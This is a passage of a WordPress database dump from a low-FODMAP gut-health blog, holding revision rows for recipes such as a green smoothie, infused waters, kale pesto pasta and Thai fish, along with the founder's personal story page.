\n','Tummy Revolution 21 Gut Health made simple','','inherit','closed','closed','','4885-autosave-v1','','','2020-04-19 02:36:56','2020-04-19 02:36:56','',4885,'http://tummyrevolution.com/4885-autosave-v1/',0,'revision','',0),(5255,1,'2020-04-19 02:40:14','2020-04-19 02:40:14','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Get the Book','','publish','closed','closed','','buy-book','','','2020-04-27 10:15:18','2020-04-27 10:15:18','',0,'http://tummyrevolution.com/?page_id=5255',0,'page','',0),(5256,1,'2020-04-19 02:40:14','2020-04-19 02:40:14','','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 02:40:14','2020-04-19 02:40:14','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5257,1,'2020-04-19 02:58:43','2020-04-19 02:58:43','\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 02:58:43','2020-04-19 02:58:43','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5258,1,'2020-04-19 03:00:31','2020-04-19 03:00:31','\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:00:31','2020-04-19 03:00:31','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5259,1,'2020-04-19 03:02:32','2020-04-19 03:02:32','\n
\"\"
Tummy Revolution 21, Gut health made simple: Low FODMAP, Includes a 21 Day Plan
\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:02:32','2020-04-19 03:02:32','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5260,1,'2020-04-19 03:08:53','2020-04-19 03:08:53','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:08:53','2020-04-19 03:08:53','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5261,1,'2020-04-19 03:09:42','2020-04-19 03:09:42','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:09:42','2020-04-19 03:09:42','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5262,1,'2020-04-19 03:10:57','2020-04-19 03:10:57','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:10:57','2020-04-19 03:10:57','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5263,1,'2020-04-19 03:11:03','2020-04-19 03:11:03','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:11:03','2020-04-19 03:11:03','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5264,1,'2020-04-19 03:11:09','2020-04-19 03:11:09','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:11:09','2020-04-19 03:11:09','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5265,1,'2020-04-19 03:11:15','2020-04-19 03:11:15','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 03:11:15','2020-04-19 03:11:15','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5266,1,'2020-04-19 06:05:30','2020-04-19 06:05:30','\n

We thought we\'d share this delicious green smoothie as we know there are still some people out there who boycott them, hahaa. The green colour makes us think it won\'t be nice but trust us mixed with the right ingredients it can taste amazing - like this one!

On the low-FODMAP diet you should only have one serving of fruit per meal so this healthy green smoothie is much better then an all fruit version.

This smoothie has 2 servings of fruit but it makes two glasses so you can either share (which we like) or keep one covered in the fridge for another meal or the next day.

To make this you\'ll need a smoothie maker like a Nutribullet or similar.

\n\n\n\n
\"\"
\n\n\n\n

Makes two glasses

Ingredients
One large handful of spinach
1/2 banana
1/2 cup of chopped pineapple chunks
1/2 teaspoon chia seeds
1 teaspoon of sunflower seeds and/or pumpkin seeds
150ml almond milk (2/3 cup)
1 vanilla pod (seeds of)
A splash of maple syrup (optional)
Ice

Place all the ingredients into the smoothie mixer and mix until smooth. Serve in your favourite cup/glass and enjoy!

\n\n\n\n
\"\"
\n','Our favourite green smoothie with spinach, pineapple & banana','','inherit','closed','closed','','4819-revision-v1','','','2020-04-19 06:05:30','2020-04-19 06:05:30','',4819,'http://tummyrevolution.com/4819-revision-v1/',0,'revision','',0),(5267,1,'2020-04-19 06:25:59','2020-04-19 06:25:59','','New green & yellow flavoured water NW','','inherit','open','closed','','new-green-yellow-flavoured-water-nw','','','2020-04-19 06:25:59','2020-04-19 06:25:59','',5125,'http://tummyrevolution.com/wp-content/uploads/2020/04/New-green-yellow-flavoured-water-NW.jpg',0,'attachment','image/jpeg',0),(5268,1,'2020-04-19 06:26:28','2020-04-19 06:26:28','\n

Flavour infused water is a good substitute for sugary drinks and a great way to rehydrate. Here are two gently infused water recipes that your tummy will enjoy. You can make flavoured water in a few minutes and keep in the fridge for 2-3 days. They can also be topped up once you’ve finished the water. 

\n\n\n\n

Makes 1 jug of each flavour

\n\n\n\n

FOR THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

½ cucumber

\n\n\n\n

2 stalks lemongrass

\n\n\n\n

4 cups (approx 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

FOR THE PINEAPPLE & MINT WATER

\n\n\n\n

1 cup (225g) chopped pineapple

\n\n\n\n

5 sprigs of mint
\n4 cups (approx. 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

MAKING THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

1. Wash and peel the cucumber length way into ribbons.

\n\n\n\n

2. Peel away the rough outer edge of the lemongrass. Cut the lemongrass in half, lengthwise. Place the lemongrass onto a cutting board. Using a rolling pin, gently smash the lemongrass. Add to the jug with the cucumber ribbons.

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge at least an hour.  Add ice and serve.

\n\n\n\n

MAKING THE PINEAPPLE & MINT WATER

\n\n\n\n

1. Place the chopped pineapple in a jug.

\n\n\n\n

2. Break  up all of the mint leaves apart from one sprig. Place the mint in the jug and finally the mint sprig. 

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge for at least an hour. Add ice and serve.

\n\n\n\n

Tip
You can swap the fruit you put into the water by using fruit from the green part of the traffic light table.

\n\n\n\n
\"\"
\n\n\n\n


\n\n\n\n


\n','Lightly flavoured water 2 ways','','inherit','closed','closed','','5125-revision-v1','','','2020-04-19 06:26:28','2020-04-19 06:26:28','',5125,'http://tummyrevolution.com/5125-revision-v1/',0,'revision','',0),(5269,1,'2020-04-19 06:28:15','2020-04-19 06:28:15','\n

Flavour infused water is a good substitute for sugary drinks and a great way to rehydrate. Here are two gently infused water recipes that your tummy will enjoy. You can make flavoured water in a few minutes and keep in the fridge for 2-3 days. They can also be topped up once you’ve finished the water. 

\n\n\n\n

Makes 1 jug of each flavour

\n\n\n\n

FOR THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

½ cucumber

\n\n\n\n

2 stalks lemongrass

\n\n\n\n

4 cups (approx 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

FOR THE PINEAPPLE & MINT WATER

\n\n\n\n

1 cup (225g) chopped pineapple

\n\n\n\n

5 sprigs of mint
\n4 cups (approx. 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

MAKING THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

1. Wash and peel the cucumber length way into ribbons.

\n\n\n\n

2. Peel away the rough outer edge of the lemongrass. Cut the lemongrass in half, lengthwise. Place the lemongrass onto a cutting board. Using a rolling pin, gently smash the lemongrass. Add to the jug with the cucumber ribbons.

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge at least an hour.  Add ice and serve.

\n\n\n\n

MAKING THE PINEAPPLE & MINT WATER

\n\n\n\n

1. Place the chopped pineapple in a jug.

\n\n\n\n

2. Break  up all of the mint leaves apart from one sprig. Place the mint in the jug and finally the mint sprig. 

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge for at least an hour. Add ice and serve.

\n\n\n\n

Tip
You can swap the fruit you put into the water by using fruit from the green part of the traffic light table.

\n\n\n\n
\"\"
\n\n\n\n


\n\n\n\n


\n','Lightly flavoured fruit and herb water','','inherit','closed','closed','','5125-revision-v1','','','2020-04-19 06:28:15','2020-04-19 06:28:15','',5125,'http://tummyrevolution.com/5125-revision-v1/',0,'revision','',0),(5270,1,'2020-04-19 06:29:36','2020-04-19 06:29:36','\n

\n\n\n\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
\n','Pasta and courgetti with super kale pesto','','inherit','closed','closed','','5060-revision-v1','','','2020-04-19 06:29:36','2020-04-19 06:29:36','',5060,'http://tummyrevolution.com/5060-revision-v1/',0,'revision','',0),(5271,1,'2020-04-19 06:30:40','2020-04-19 06:30:40','\n

I\'m a huge fan of fruit and happily eat most fruits as they come. Sometimes it\'s nice to do something a bit more special with fruit though and this recipe is definitely special. Panfried bananas and oranges lightly coated with cinnamon and maple syrup mmmm..., then top it off with some whipped coconut or vanilla cream - amazing!

If you have a troubling tummy like me some fruits are better to eat than others. Bananas and oranges and both on the good list - yesss! so this recipe works well for troubling tumms. What I like with this recipe is the combination of the cinnamon flavoured banana mixed with the citrus flavour of the orange and then topped off with some coconutty cream (or vanilla if you choose that option). It is just such nice mix of flavours and I love the way it looks on the plate too - perfect for a dinner party.

You do want to eat this dessert warm though as it is not half as good cold - believe me, I\'ve tried it.
Luckily it\'s very easy to make so it will not take you long to get it ready.

If you\'ve not made whipped coconut cream, don\'t worry, It\'s very easy to make and if you make some extra you can store it in your fridge and have with other fruits and berries.

\n\n\n\n
\"\"
\n\n\n\n

INGREDIENTS

2 oranges

\n\n\n\n

2 ripe, but firm bananas, sliced

\n\n\n\n

1 tbsp butter or coconut oil

\n\n\n\n

1 tsp pure maple syrum

\n\n\n\n

1/8 tsp cinnamon

\n\n\n\n

1/8 tsp vanilla extract

\n\n\n\n

pinch of sea salt

\n\n\n\n

Coconut Cream:

\n\n\n\n

1 can full fat coconut milk or cream

\n\n\n\n

1 tsp grated orange zest (optional)

\n\n\n\n

Toppings:

\n\n\n\n

Unsweetened coconut flakes

\n\n\n\n

Chopped Macadamia nuts

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

Over medium heat, melt the butter and maple syrup in a frying pan. Add cinnamon, salt and vanilla extract, and stir to combine.

\n\n\n\n

Place the sliced in half bananas in the pan and cook on medium heat for 2-4 minutes each side. Be sure to watch bananas as they caramelize to ensure they don’t brown.

\n\n\n\n

Remove the bananas from the pan and add the sliced in half oranges. Cook for 2-3 minutes over medium heat.

\n\n\n\n

Take the pan off the heat and remove the oranges.

\n\n\n\n

While bananas and oranges are cooling, open your coconut cream. Gently pour out the coconut water that is separated and sitting on top of the coconut cream into a separate bowl.

\n\n\n\n

Place the thick cream that remains in a mixing bowl and whip until peaks form (about 2-3 minutes on high if using a mixer), then stir in some orange zest.

You can also use normal whipping cream. I then add some vanilla extract and orange zest.

\n\n\n\n

Place out your oranges on plates and lace one banana slice on each orange. Top them off with coconut cream, chopped macadamia nuts, and coconut flakes.

\n\n\n\n
\"\"
\n','Pan-fried bananas & oranges with coconut cream','','inherit','closed','closed','','5054-revision-v1','','','2020-04-19 06:30:40','2020-04-19 06:30:40','',5054,'http://tummyrevolution.com/5054-revision-v1/',0,'revision','',0),(5272,1,'2020-04-19 06:33:04','2020-04-19 06:33:04','\n

Happy New Year to you all! Hope you\'ve had an enjoyable festive period. 
Are you all set for a new year and new adventures? I hope so! There\'s no better place to start new adventures then in the kitchen if you ask me :) Asian food is so tasty and every time I cook an asian dish I wonder why I don\'t do it more often because the flavours are usually amazing. This Asian dish is not just beautiful but it\'s also full of lovely flavours. The lemongrass in the sauce is a delicate flavour that works very well with fish and the crunchy cucumber brings another texture to the dish.

I found this recipe on a food blog called \'Well-fed soul\' and I thought I\'d try it out (you can find the original recipe here). I wanted to make it \'tummy friendly\' so I had to change a few ingredients such as the noodles and the garlic. I also choose white fish instead of salmon as in the original recipe. Sometimes I find recipes I want to try but find that they have too many ingredients that my tummy doesn\'t agree with. 
Sometimes it can be easy to substitute ingredients for more \'tummy friendly\' alternatives, but sometimes it\'s just not possible. I try to choose recipes where I can see it won\'t be too hard to substitute ingredients and most of the time it works out well. This time it worked out really well and I can honestly say that this is the best fish dish I\'ve had in a long time. I love the thai sauce that you use for the fish and noodles and the spiralized cucumbers really compliment the fish and flavours. It was fairly easy to make too so I would definitely recommend trying it out. It\'s a perfect dish to kickstart your new year! 

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
2 tbsp garlic infused olive oil
1 ½ tbsp minced lemon grass
1 tbsp freshly grated ginger
60ml (¼ cup) soya or tamari
2 tbsp rice vinegar
2 tsp maple syrup
500g fish filets such as cod, hake or salmon
2 spring onions, finely chopped 
salt & pepper to taste
200g brown rice noodles 
¼ courgette/zucchini, spiralized
½ cucumber, spiralized 
Some fresh basil
Some toasted pine nuts

\n\n\n\n

INSTRUCTIONS
Heat a large frying pan over medium-high heat; add 1 tbsp garlic infused olive oil.  Add the lemongrass, ginger; saute 1 minute until fragrant, then remove from heat and transfer to a small bowl. Whisk in the soya (or tamari), rice vinegar, and maple syrup. 

\n\n\n\n

Return the frying pan to medium-high heat and add the remaining 1 tbsp of garlic infused olive oil.  Season the fish fillets with salt and pepper, then lightly brush each with 1-2 tbsp.of the lemongrass sauce.   

\n\n\n\n

When the frying pan is hot, add the fish, (skin-side down if it has skin); sear until golden, about 3-4 minutes, then flip with tongs and reduce heat to medium.  Continue cooking an additional 6-8 minutes or until the fish is cooked through.

Meanwhile, bring a large pot of water to a boil; add the brown rice noodles and cook according to package directions. Cook until noodles are done, then drain and return the noodles to the pot.  Add the remaining lemongrass sauce to the noodles, tossing with tongs to coat. 

\n\n\n\n
\"\"/
\n\n\n\n

Serve the fish on top of a bed of rice noodles with spiralized cucumber, spring onions, toasted pine nuts, and fresh basil if desired.

\n','Thai infused fish with brown rice noodles & spirilized cucumber','','inherit','closed','closed','','4659-revision-v1','','','2020-04-19 06:33:04','2020-04-19 06:33:04','',4659,'http://tummyrevolution.com/4659-revision-v1/',0,'revision','',0),(5273,1,'2020-04-19 06:34:00','2020-04-19 06:34:00','\n

Happy New Year to you all! Hope you\'ve had an enjoyable festive period. 
Are you all set for a new year and new adventures? I hope so! There\'s no better place to start new adventures then in the kitchen if you ask me :) Asian food is so tasty and every time I cook an asian dish I wonder why I don\'t do it more often because the flavours are usually amazing. This Asian dish is not just beautiful but it\'s also full of lovely flavours. The lemongrass in the sauce is a delicate flavour that works very well with fish and the crunchy cucumber brings another texture to the dish.

I found this recipe on a food blog called \'Well-fed soul\' and I thought I\'d try it out (you can find the original recipe here). I wanted to make it \'tummy friendly\' so I had to change a few ingredients such as the noodles and the garlic. I also choose white fish instead of salmon as in the original recipe. Sometimes I find recipes I want to try but find that they have too many ingredients that my tummy doesn\'t agree with. 
Sometimes it can be easy to substitute ingredients for more \'tummy friendly\' alternatives, but sometimes it\'s just not possible. I try to choose recipes where I can see it won\'t be too hard to substitute ingredients and most of the time it works out well. This time it worked out really well and I can honestly say that this is the best fish dish I\'ve had in a long time. I love the thai sauce that you use for the fish and noodles and the spiralized cucumbers really compliment the fish and flavours. It was fairly easy to make too so I would definitely recommend trying it out. It\'s a perfect dish to kickstart your new year! 

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS
2 tbsp garlic infused olive oil
1 ½ tbsp minced lemon grass
1 tbsp freshly grated ginger
60ml (¼ cup) soya or tamari
2 tbsp rice vinegar
2 tsp maple syrup
500g fish filets such as cod, hake or salmon
2 spring onions, finely chopped 
salt & pepper to taste
200g brown rice noodles 
¼ courgette/zucchini, spiralized
½ cucumber, spiralized 
Some fresh basil
Some toasted pine nuts

\n\n\n\n

INSTRUCTIONS
Heat a large frying pan over medium-high heat; add 1 tbsp garlic infused olive oil.  Add the lemongrass, ginger; saute 1 minute until fragrant, then remove from heat and transfer to a small bowl. Whisk in the soya (or tamari), rice vinegar, and maple syrup. 

\n\n\n\n

Return the frying pan to medium-high heat and add the remaining 1 tbsp of garlic infused olive oil.  Season the fish fillets with salt and pepper, then lightly brush each with 1-2 tbsp.of the lemongrass sauce.   

\n\n\n\n

When the frying pan is hot, add the fish, (skin-side down if it has skin); sear until golden, about 3-4 minutes, then flip with tongs and reduce heat to medium.  Continue cooking an additional 6-8 minutes or until the fish is cooked through.

Meanwhile, bring a large pot of water to a boil; add the brown rice noodles and cook according to package directions. Cook until noodles are done, then drain and return the noodles to the pot.  Add the remaining lemongrass sauce to the noodles, tossing with tongs to coat. 

\n\n\n\n
\"\"/
\n\n\n\n

Serve the fish on top of a bed of rice noodles with spiralized cucumber, spring onions, toasted pine nuts, and fresh basil if desired.

\n','Thai infused fish, brown rice noodles & spirilized cucumber','','inherit','closed','closed','','4659-revision-v1','','','2020-04-19 06:34:00','2020-04-19 06:34:00','',4659,'http://tummyrevolution.com/4659-revision-v1/',0,'revision','',0),(5274,1,'2020-04-19 06:35:05','2020-04-19 06:35:05','\n

We thought we\'d share this delicious green smoothie as we know there are still some people out there who boycott them, hahaa. The green colour makes us think it won\'t be nice but trust us mixed with the right ingredients it can taste amazing - like this one!

On the low-FODMAP diet you should only have one serving of fruit per meal so this healthy green smoothie is much better then an all fruit version.

This smoothie has 2 servings of fruit but it makes two glasses so you can either share (which we like) or keep one covered in the fridge for another meal or the next day.

To make this you\'ll need a smoothie maker like a Nutribullet or similar.

\n\n\n\n
\"\"
\n\n\n\n

Makes two glasses

Ingredients
One large handful of spinach
1/2 banana
1/2 cup of chopped pineapple chunks
1/2 teaspoon chia seeds
1 teaspoon of sunflower seeds and/or pumpkin seeds
150ml almond milk (2/3 cup)
1 vanilla pod (seeds of)
A splash of maple syrup (optional)
Ice

Place all the ingredients into the smoothie mixer and mix until smooth. Serve in your favourite cup/glass and enjoy!

\n\n\n\n
\"\"
\n','Green smoothie with spinach, pineapple & banana','','inherit','closed','closed','','4819-revision-v1','','','2020-04-19 06:35:05','2020-04-19 06:35:05','',4819,'http://tummyrevolution.com/4819-revision-v1/',0,'revision','',0),(5275,1,'2020-04-19 09:45:46','2020-04-19 09:45:46','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 09:45:46','2020-04-19 09:45:46','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5276,1,'2020-04-19 10:34:20','2020-04-19 10:34:20','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 10:34:20','2020-04-19 10:34:20','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5277,1,'2020-04-19 11:10:31','2020-04-19 11:10:31','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 11:10:31','2020-04-19 11:10:31','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5278,1,'2020-04-19 11:11:53','2020-04-19 11:11:53','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 11:11:53','2020-04-19 11:11:53','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5279,1,'2020-04-19 11:47:03','2020-04-19 11:47:03','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 11:47:03','2020-04-19 11:47:03','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5280,1,'2020-04-19 11:48:03','2020-04-19 11:48:03','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 11:48:03','2020-04-19 11:48:03','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5281,1,'2020-04-19 11:48:38','2020-04-19 11:48:38','\n\n\n\n\n\n\n\n\n\n\n\n\n\n','Buy Book','','inherit','closed','closed','','5255-revision-v1','','','2020-04-19 11:48:38','2020-04-19 11:48:38','',5255,'http://tummyrevolution.com/5255-revision-v1/',0,'revision','',0),(5282,1,'2020-04-20 01:35:36','2020-04-20 01:35:36','','articles and news','','publish','closed','closed','','articles-and-news','','','2020-04-23 23:15:52','2020-04-23 23:15:52','',0,'http://tummyrevolution.com/?page_id=5282',0,'page','',0),(5283,1,'2020-04-20 01:35:36','2020-04-20 01:35:36','','Free Resources','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:35:36','2020-04-20 01:35:36','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5284,1,'2020-04-20 01:37:17','2020-04-20 01:37:17','','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:37:17','2020-04-20 01:37:17','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5285,1,'2020-04-20 01:45:43','2020-04-20 01:45:43','\n

hi

\n','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:45:43','2020-04-20 01:45:43','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5286,1,'2020-04-20 01:46:37','2020-04-20 01:46:37','','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:46:37','2020-04-20 01:46:37','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5288,1,'2020-04-20 01:49:12','2020-04-20 01:49:12','[vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"2\" grid_id=\"vc_gid:1587347274839-4ad801e7-f3cf-5\" taxonomies=\"94\"][/vc_column][/vc_row]','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:49:12','2020-04-20 01:49:12','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5289,1,'2020-04-20 01:50:05','2020-04-20 01:50:05','[vc_row][vc_column][vc_basic_grid post_type=\"post\" max_items=\"5\" element_width=\"12\" grid_id=\"vc_gid:1587347364018-712e4de8-a28e-10\" taxonomies=\"94\"][/vc_column][/vc_row]','articles and news','','inherit','closed','closed','','5282-revision-v1','','','2020-04-20 01:50:05','2020-04-20 01:50:05','',5282,'http://tummyrevolution.com/5282-revision-v1/',0,'revision','',0),(5290,1,'2020-04-20 01:53:20','2020-04-20 01:53:20','','BLOG','','publish','closed','closed','','blog-6','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/?p=5290',4,'nav_menu_item','',0),(5291,1,'2020-04-20 01:53:53','2020-04-20 01:53:53','','BLOG','','publish','closed','closed','','blog-7','','','2020-04-22 20:25:57','2020-04-22 20:25:57','',0,'http://tummyrevolution.com/?p=5291',2,'nav_menu_item','',0),(5293,1,'2020-04-21 08:09:09','2020-04-21 08:09:09','','Welcome-to-Tummy-revolution-small','','inherit','open','closed','','welcome-to-tummy-revolution-small','','','2020-04-21 08:09:09','2020-04-21 08:09:09','',4863,'http://tummyrevolution.com/wp-content/uploads/2020/04/Welcome-to-Tummy-revolution-small.jpg',0,'attachment','image/jpeg',0),(5294,1,'2020-04-21 08:09:22','2020-04-21 08:09:22','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health

My other passion is photography and I feel lucky to be able to combine my love for cooking with photography. I’m also a busy mum of cheeky but gorgeous twins and spend any spare time I have with my family.

Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

Discovering that milk had such a negative effect on my tummy and health lead me to believe that there might be other foods that affected my tummy. I was already into healthy eating so there were no obvious foods that stood out. The only thing I could think of was gluten so I decided to investigate how gluten can affect certain people with gut problems.

\n\n\n\n

One of the first gluten articles I read talked about something called the low-FODMAP diet. I got so intrigued reading about this method I decided to give it a try straight away. The scientific study behind the low-FODMAP diet finally explained why I had struggled with a bad tummy all these year and how certain food had made me feel so unwell.
The low-FODMAP diet was a life changer for me, which lead me to living a happy health life free of tummy troubles.

The low-FODMAP diet is not a diet in the normal sense but rather a way of helping you altering your diet in order for your gut and body to feel well so that you can live a healthy happy life.

\n\n\n\n

Being on the low-FODMAP diet does means you have to make changes to the way you eat which can be a real challenge for many as it was for me when I first decided to try it out. The initial questions were many and I was unsure of where to start, what to cook, what ingredients to use and what foods I could and could not eat. 
Over the years I’ve had lots of ups and also downs, I’ve developed, tried and tested numerous FODMAP recipes that are healthy, easy to cook and taste great. To help you get started cooking some great tasting tummy friendly food I share many of my recipes on the blog and I provide some free resources 

There is much more to come so sign up for the newsletter to stay up to date on new resources, recipes, tips and an exciting new book!!

Thank you checking in and hope you stay for a while.

Sara 

\n','My Story','','inherit','closed','closed','','4863-revision-v1','','','2020-04-21 08:09:22','2020-04-21 08:09:22','',4863,'http://tummyrevolution.com/4863-revision-v1/',0,'revision','',0),(5295,1,'2020-04-22 08:15:17','2020-04-22 08:15:17','\n\n\n\n\n


I\'m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms. Having suffered with a troubling tummy for years, I finally discovered how to control my symptoms by making some adjustments to my diet. It was a revelation that inspired me to start a revolution to help others to feel great too! 

I’m a home cook who loves experimenting; creating great tasting food that can help improve your overall health. I hope my recipes inspire you to cook some tummy friendly food that will improve your health. My other passion is photography and I feel lucky to be able to combine my love for cooking with photography.

\n\n\n\n

I was born and brought up in Sweden before moving to the UK in my late teens where I studies and meet my husband Andrew. In 2016 we moved to Dubai where we now currently live. I tend to spend our time between the UK, Sweden and Dubai and feel lucky to have the opportunity to see and experience different countries, cultures and people. I love an adventure and always look forward to the next one.

\n\n\n\n

I’m also a mum of twins Noah and Evelyn who are great critics of my cooking. They will tell me honestly if what I cook is good or bad and love sampling food, especially deserts and treats.

Want to read on about how I cured my digestive issues and started feeling great again? Well, here\'s a bit more about how Tummy Revolution came to be: 

\n\n\n\n

Looking back to my teenage years I remember sitting on the bus to school often feeling a bit unwell. My stomach was always churning and I felt nauseous. Back then I didn’t dwell much on it and in my twenties, when my symptoms got worse, I simply put it down to “a bad tummy” and stress. I saw a number of doctors and was prescribed medications, which gave temporarily relief but no cure.

\n\n\n\n

I lived with a troubling tummy for years and simply thought it was just the way things were. It wasn’t until a few years ago when I suddenly had a lightbulb moment that things finally changed and I was able to cure my troubling tummy and turn my health around.

\n\n\n\n

At the time I had moved to a new house and had gradually started feeling more nauseous and bloated then normally. I initially thought it was the drinking water and had it tested. Crazy I know! Needless to say there was nothing wrong with the water.
Then one morning after my usual tea with milk it suddenly stuck me that it might be the milk that made me feel unwell. I immediately cut out milk from my diet and BAM! I felt better then I’d done in many years.

\n\n\n\n

